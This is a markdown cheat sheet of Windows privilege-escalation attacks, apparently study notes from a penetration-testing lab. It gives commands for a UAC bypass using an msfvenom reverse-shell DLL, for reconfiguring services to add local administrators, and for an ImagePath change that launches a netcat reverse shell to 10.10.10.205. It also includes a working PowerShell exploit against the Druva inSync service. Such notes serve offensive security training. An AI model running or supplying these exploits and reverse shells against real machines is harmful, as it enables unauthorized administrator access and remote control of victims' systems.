# OS Attacks ## User Account Control (UAC) ### Confirming UAC Enabled ```powershell REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA ``` ### Checking UAC Level (When Enabled) ```powershell REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin ``` ### Bypassing UAC (Method) ```powershell # Checking Path Variable cmd /c echo %PATH% # Generate Reverse Shell msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=8443 -f dll > srrstr.dll # Test Reverse Shell rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll # Execute UAC C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe ``` ## Weak Permissions ### Weak Permission Audit ```powershell .\SharpUp.exe audit ``` #### Manually Permission Check ```powershell icals ``` #### 1 Replace Service Bin Path ```powershell sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add" ``` #### 2 Restart Service ```cmd sc start WindscribeService ``` ## Unquoted Service Path #### Find Unquoted Service Paths ```powershell wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ``` ### Check Weak Service ACL (Accessschk.exe) ```powershell accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services ``` ### Modify Image-Path ```powershell Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443" ``` ## Vulnerable Services ### Gather Installed Programs ```powershell wmic product get name ``` ### Gather Running Service ```powershell get-service | ? {$_.DisplayName -like 'Druva*'} ``` #### PoC ```powershell $ErrorActionPreference = "Stop" $cmd = "net user htb-student /add" $s = New-Object System.Net.Sockets.Socket( [System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp ) $s.Connect("127.0.0.1", 6064) $header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]") $rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0") $command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd"); $length = [System.BitConverter]::GetBytes($command.Length); $s.Send($header) $s.Send($rpcType) $s.Send($length) $s.Send($command) ```